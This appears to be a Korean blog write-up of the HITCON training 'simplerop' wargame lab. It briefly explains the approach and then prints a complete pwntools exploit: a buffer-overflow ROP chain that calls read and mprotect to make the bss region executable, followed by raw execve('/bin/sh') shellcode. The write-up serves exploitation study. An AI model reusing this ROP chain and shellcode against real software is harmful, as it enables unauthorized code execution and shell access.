static 컴파일된 바이너리로 libc를 릭하지 않아도 풀 수 있었다.

하지만 binsh이 바이너리에 없어서 srop를 해 푸려고 했는데 잘 안돼서 mprotect로 bss영역의 권한을 7로 변경한 후 bss에 넣어둔 쉘코드를 실행하는 방법으로 익스했다.



?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from pwn import *
 
r = process("./simplerop")
elf = ELF("./simplerop")
 
bss = elf.bss()
read = elf.symbols['read']
write = elf.symbols['write']
mprotect = elf.symbols['mprotect']
ppr = 0x804838d
pppr = 0x804838c
syscall = 0x0806eef0
cmd = "/bin/sh\x00"
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
 
log.info("bss : {}".format(hex(bss)))
log.info("read : {}".format(hex(read)))
log.info("mprotect : {}".format(hex(mprotect)))
 
payload = "A"*32
 
payload += p32(read)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(shellcode))
 
payload += p32(mprotect)
payload += p32(pppr)
payload += p32(0x080ea000)
payload += p32(0x10000)
payload += p32(7)
 
payload += p32(bss)
r.sendline(payload)
print r.recv()
r.sendline(shellcode)
r.interactive()

'Wargame > Hitcon training' 카테고리의 다른 글

HITCON training lab11 (house of force)  (0) 2018.10.29
HITCON training lab10  (0) 2018.10.25
HITCON training lab6  (0) 2018.10.22
HITCON training lab4  (0) 2018.10.18
HITCON training lab12 (fastbin dup)  (0) 2018.10.08

+ Recent posts

티스토리툴바